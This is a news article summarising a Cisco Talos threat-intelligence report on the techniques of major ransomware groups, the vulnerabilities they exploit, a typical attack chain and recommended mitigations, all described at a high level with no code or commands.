Cisco Talos Report Reveals Critical Insights in Ransomware Trends

• Cisco Talos Intelligence recently published a report on prominent ransomware groups’ tactics, techniques, and procedures.
• The report covered 14 ransomware groups active between 2023 and 2024, offering vital insights into existing ransomware strategies and recommendations for risk mitigation.

Ransomware attacks are increasingly common, and understanding the strategies utilized by malicious actors is vital to maintaining a robust cybersecurity posture. Cisco Talos Intelligence recently published a comprehensive report analyzing the tactics, techniques, and procedures of 14 major ransomware groups, shedding light on strategies and offering critical mitigation recommendations.

Key Insights

• Initial access: Ransomware groups typically gain access to target systems via phishing or known vulnerabilities, especially in public-facing applications. This is often followed by lateral movement techniques to bolster their reach within the network.
• Defense evasion: Attackers disable or modify security software, obfuscate code, and use legitimate tools such as PowerShell and Windows Management Instrumentation to blend in with regular network traffic. This makes it challenging for security solutions to differentiate between malicious and legitimate activities.
• Credential access: Attackers frequently target Local Security Authority Subsystem Service (LSASS) memory to extract credentials, allowing lateral movement to access critical systems without detection.
• Command and control: Legitimate remote monitoring and management tools enable attackers to control compromised systems while avoiding detection. Since such tools are often allowed in organizations, it is easier for ransomware attackers to operate undetected.

See More: Snowflake Implements Mandatory MFA Following Major Data Breach

Prominent Ransomware Groups

The following are some of the prominent ransomware groups identified by the study.

• AlphV/Blackcat and Rhysida: Known for their wide range of TTPs, these groups are very adaptive, often customizing their attacks to their target environment.
• BlackBasta and LockBit: These attackers are notorious for their aggressive tactics, which focus on encrypting data and disfiguring systems to maximize the pressure on victims to accept ransom demands.
• Clop: Unlike most others, Clop was found primarily engaging in data theft and extortion while not always encrypting its victims’ data. The group focuses on exfiltrating sensitive information and threatening to release such data publicly if the ransom is unpaid.

Exploited Vulnerabilities

Despite the vast number of vulnerabilities discovered each month, ransomware groups were found focusing on a few high-impact unpatched flaws:

• CVE-2018-13379: This flaw targets Fortinet’s SSL VPN, allowing attackers to gain unauthorized access to networks by exploiting a path traversal flaw.
• CVE-2020-1472 (Zerologon): This vulnerability allows privilege escalation within domain controllers, making it a prime target for attackers aiming to control an entire network.
• CVE-2023-0669: This vulnerability affects the GoAnywhere MFT software, enabling arbitrary code execution, which attackers can use to take over affected systems.

Typical Ransomware Attack Chains

According to the report, a typical ransomware attack chain involves several stages:

• Initial access: Access is often gained through malicious attachments, phishing emails, or vulnerabilities in public-facing applications.
• Execution: Malicious payloads are executed on the victim’s machine, often through scripts or malicious documents.
• Persistence: The attacker establishes persistence by adding registry entries, setting up scheduled tasks, or using legitimate tools.
• Privilege escalation: Attackers might escalate their privileges to gain higher-level access within the network.
• Credential access: Techniques like credential dumping from LSASS memory are used to obtain authentication details.
• Lateral movement: Attackers move laterally across the network to identify and access critical systems.
• Data exfiltration: Sensitive data is exfiltrated before the encryption process begins.
• Impact: The ransomware is deployed to encrypt data and render systems inoperable until the ransom is paid.

Mitigation Strategies

The report also covered some of the more important best practices that can help organizations minimize the risk of being impacted by a ransomware attack:

• Patch management: Administrators must regularly update systems to fix vulnerabilities, focusing on high-impact flaws frequently targeted by attackers.
• Password policies and MFA: Strong passwords and multi-factor authentication (MFA) measures should be enforced to reduce the risk of unauthorized access and credential theft.
• System hardening: To reduce the overall attack surface, unnecessary services should be disabled, and security configurations should be applied.
• Network segmentation: Sensitive data and systems should be isolated to minimize lateral movement while limiting the impact of a potential breach.
• Continuous monitoring: Organizations should implement Endpoint Detection and Response (EDR/XDR) and Security Information and Event Management (SIEM) solutions to detect and respond to suspicious activities in real-time.
• Limit privilege: One should limit user access to essential functions, minimizing the potential damage from compromised accounts.
• Cut IT exposure: Reduce the number of public-facing services to reduce potential entry points.

Takeaways

The report by Cisco Talos highlights the growing sophistication of modern ransomware groups’ methods and the need for stringent security measures. Implementing mitigation strategies will allow organizations to defend against such threats, ensuring system and data security. You can find the full report hereOpens a new window .

LATEST NEWS STORIES

• Intuit Plans to Lay Off 1,800 People and Hire New Talent with Focus on AI
• Google’s Updated Advanced Protection Program: Passkey Security for High-Risk Users
• Microsoft and Apple Back Away from OpenAI Board Over Increased Scrutiny of Big Tech Investments
• International Law Enforcement Operation Takes Down Russian AI-Powered Bot Farm on X